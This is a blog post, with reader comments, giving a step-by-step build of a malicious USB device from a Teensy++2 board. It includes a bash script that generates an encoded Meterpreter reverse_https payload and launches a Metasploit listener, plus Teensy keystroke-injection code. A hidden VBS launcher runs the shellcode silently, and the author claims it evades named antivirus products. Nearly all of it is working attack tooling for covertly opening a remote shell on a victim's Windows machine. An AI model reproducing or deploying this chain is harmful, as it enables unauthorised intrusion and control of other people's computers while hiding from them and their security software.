Teensy++2 Metasploit Part. 2

Posted on July 27, 2011 by

 

Avoiding anti-virus software in order to execute our payloads off Teensy is my next exercise. Lately most of the Metasploit generated loaders get detected. There are various techniques to bypass this detection. I stumbled across Bernardo Dameles blogpost and decided to use his technique on a Teensy++2

The original article is here   execute-metasploit-payloads-bypassing.html

All the steps here are already covered in the previous article here  Teensy2-0-and-metasploit So once again with our Teensy and Arduino programming enviroment set-up on our linux box we can create a new project “trojaned-usbdrive” for example

Our code is a little different than previously  (Again place this in the Metasploit root folder)

#!/bin/bash
echo "************************************************************"
echo "           Automatic shellcode generator                    "
echo "                                                            "
echo "************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig tun0  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   FreeBSD|OpenBSD) IP=`ifconfig  tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
   SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -e x86/alpha_mixed -t raw BufferRegister=EAX > alphacode 

if [ ! -d "$ShellCode" ]; then
mkdir ShellCode
fi
mv alphacode ShellCode
echo -e  "a.exe \c" > ShellCode/run.bat
cat ShellCode/alphacode >> ShellCode/run.bat
rm ShellCode/alphacode  
mv ShellCode/run.bat /home/knoppix/arduino-0022/trojaned_usbdrive/disk

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate explorer.exe'  E

We are using Alpha_mixed encoding to create our Meterpreter shellcode.  What happens here is that reverse_https meterpreter payload is encoded via msfencode using Alpha-mixed chars, file is dumped as alphacode to Shellcode subdirectory and run.bat gets created there as well.  Then it moves the run.bat into the project directory of you arduino installation folder (trojaned_usbdrive) in this example and starts the multi handler listener.

Now we need to get the shellcodexec win32 binary from github.com/inquisb/shellcodeexec  You can get the sources there and compile it for x64 too.  In this example I named the file a.exe and moved it into the disk folder in the “trojaned-usbdrive” project folder.

Next we have the Teensy++2 code that loads everything:

#include <phukdlib.h>
void setup() {
  }

void loop () {
  delay(9000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("powershell");
  PressAndRelease(KEY_ENTER,1);
  delay(8000);
  Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
  PressAndRelease(KEY_ENTER,1);
  delay(1000);
  Keyboard.print("$drive = $disk.substring(2,2)");
  PressAndRelease(KEY_ENTER,1);
  delay(1000);
  Keyboard.print("cd $drive");
  PressAndRelease(KEY_ENTER,1);  
  delay(500);
  Keyboard.print("invoke-expression $drive");
  Keyboard.set_key1 (KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("exec.vbs");
  PressAndRelease(KEY_ENTER,1);
  delay(1000);
  Keyboard.print("exit");
  PressAndRelease(KEY_ENTER,1);
  delay(9000000);
}

Our exec.vbs is almost the same as before to make sure the whole process is invisible to the user..

Set oShell = CreateObject("Wscript.shell")
sPath=Wscript.ScriptFullName
x=InstrRev(sPath, "\")
sPath=Left(sPath,x)
sCmd = sPath+"run.bat"
oShell.Run sCmd,0,False

So you need 3 files in the trojaned-usbdrive folder : a.exe run.bat and exec.vbs. When this loads its fast, silent and does not leave too much noise on the screen.

This should get by most of antivirus software undetected. (Tested against Trend Micro, Kaspersky …)

Part 3… The Final Product 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to Teensy++2 Metasploit Part. 2

  1. codeforge says:
    May 15, 2012 at 11:16 am

    Hi,
    i get different character when i connect the teensy to the usb, i get a ì instead of ‘=’ and cannot execute the code… how can i do to get a = (equal) instead ì ?

    thanks

    Reply
    • astr0baby says:
      May 15, 2012 at 7:56 pm

      Hi
      where exactly do you have the problem with equals ? is it in the Keyboard.print(“$disk = wmic … command here ? If this is the case you can split the command and use the KEY_EQUAL instead. Look here for info
      http://www.pjrc.com/teensy/usb_keyboard.html
      So you would do this :

      Keyboard.print(“$disk);
      Keyboard.set_key1 (KEY_EQUAL);
      Keyboard.print(” wmic logicaldisk list brief | sel….);
      etc….

      Reply
  2. codeforge says:
    May 15, 2012 at 10:19 pm

    hi,
    thanks for reply, i try to do how you suggest but i get same result.
    I resolved the problem changing keyboard layout in wondows ro english, with my default italian keyboard i get bad character, with english the teensy found :)

    thanks again for reply

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Cancel

Connecting to %s